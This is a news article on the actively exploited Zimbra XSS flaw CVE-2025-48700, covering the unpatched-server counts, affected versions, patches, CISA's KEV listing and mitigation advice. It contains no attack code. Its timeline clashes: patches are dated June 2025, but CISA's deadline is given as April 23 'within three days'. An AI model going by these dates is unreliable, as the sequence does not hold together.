CISA: Zimbra XSS (CVE-2025-48700) Now Exploited

Over 10,000 instances of the Zimbra Collaboration Suite are exposed online and remain vulnerable to an actively exploited cross-site scripting flaw, raising fresh alarms about email server security for governments and businesses alike. The vulnerability, tracked as CVE-2025-48700, is serious because it can be triggered without user interaction and has been confirmed as abused in the wild, prompting action from both vendors and national cybersecurity authorities.

What happened

Shadowserver, an Internet security watchdog, reported that more than 10,500 Zimbra servers exposed to the Internet remain unpatched for a critical XSS vulnerability. Synacor, the company that maintains Zimbra, released patches addressing CVE-2025-48700 in June 2025 after warning that the exploit requires no user interaction and can be triggered simply when a recipient views a maliciously crafted email in the Zimbra Classic UI. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) subsequently flagged the vulnerability as being actively exploited and added it to its Known Exploited Vulnerabilities (KEV) Catalog, urging rapid remediation.

Who is affected

The affected versions include ZCS 8.8.15, 9.0, 10.0, and 10.1. Zimbra is widely used across public and private sectors—deployments include hundreds of government agencies and thousands of businesses—so the exposed population spans diverse organizations. Shadowserver’s breakdown shows most unpatched servers are in Asia (3,794) and Europe (3,793), underscoring the global scale of the exposure.

How the flaw works

CVE-2025-48700 is a cross-site scripting (XSS) vulnerability that allows unauthenticated attackers to inject and execute arbitrary JavaScript in a user’s webmail session. In practice, a crafted email message displayed in the vulnerable Zimbra Classic UI can execute code in the context of the user’s session, potentially exposing sensitive information such as session tokens, mail content, or other data accessible within the webmail interface. Because the exploit can operate without attachments or links, it is particularly stealthy and hard to detect with traditional email defenses.

Response and timeline

Synacor published security patches in June 2025 to remediate the issue. CISA’s inclusion of the vulnerability in its KEV Catalog and its directive to Federal Civilian Executive Branch (FCEB) agencies to secure Zimbra servers within three days (by April 23) reflect the urgency of the threat and the expectation that organizations treat the flaw as a high-priority emergency. Shadowserver’s ongoing scans and disclosures continue to highlight the number of unpatched, Internet-facing installations that remain at risk.

Why this matters

Zimbra servers often host sensitive communications for organizations with elevated security needs. XSS in a webmail context can turn any recipient into an unwitting execution environment for attacker code, enabling email theft, account takeover, or further lateral phishing inside an organization. The size and distribution of vulnerable servers mean that a successful, scalable campaign could harvest large volumes of credentials and correspondence, with outsized operational and reputational consequences for affected entities.

What administrators should do

Apply patches from Synacor immediately for all affected ZCS versions.
If patching is not immediately possible, implement compensating controls such as isolating webmail interfaces behind VPNs or network access controls, restricting administrative access, and increasing monitoring for anomalous behavior on mail servers.
Review email gateway and web-proxy logs for suspicious patterns or indicators of compromise, and consider temporary hardening measures in the UI layer if feasible.
Audit exposed servers using external scanning services (like Shadowserver) to identify any publicly accessible Zimbra instances and remediate them promptly.
Communicate with users about the risk of stealthy email-based attacks and encourage safe handling of unexpected messages even when they contain no attachments or links.

Looking back: past Zimbra exploitation campaigns

Zimbra has been targeted repeatedly by sophisticated threat actors. Earlier XSS and related flaws were exploited by groups such as APT28 (Fancy Bear/Strontium) in campaigns that delivered obfuscated JavaScript through email bodies, and by other nation‑linked operators in large-scale operations. Past incidents demonstrate that webmail XSS vulnerabilities can be weaponized to steal messages and credentials from high-value targets, making rapid patching and proactive defenses essential.

Conclusion

The discovery of active exploitation against CVE-2025-48700 and Shadowserver’s finding of over 10,500 unpatched servers is a stark reminder that widely deployed collaboration software can become an attractive vector for mass compromise. Organizations running affected Zimbra versions must prioritize patching, apply mitigations where necessary, and monitor their environments closely to prevent and detect abuse. Failure to act quickly risks exposing sensitive communications and enabling further intrusion across networks.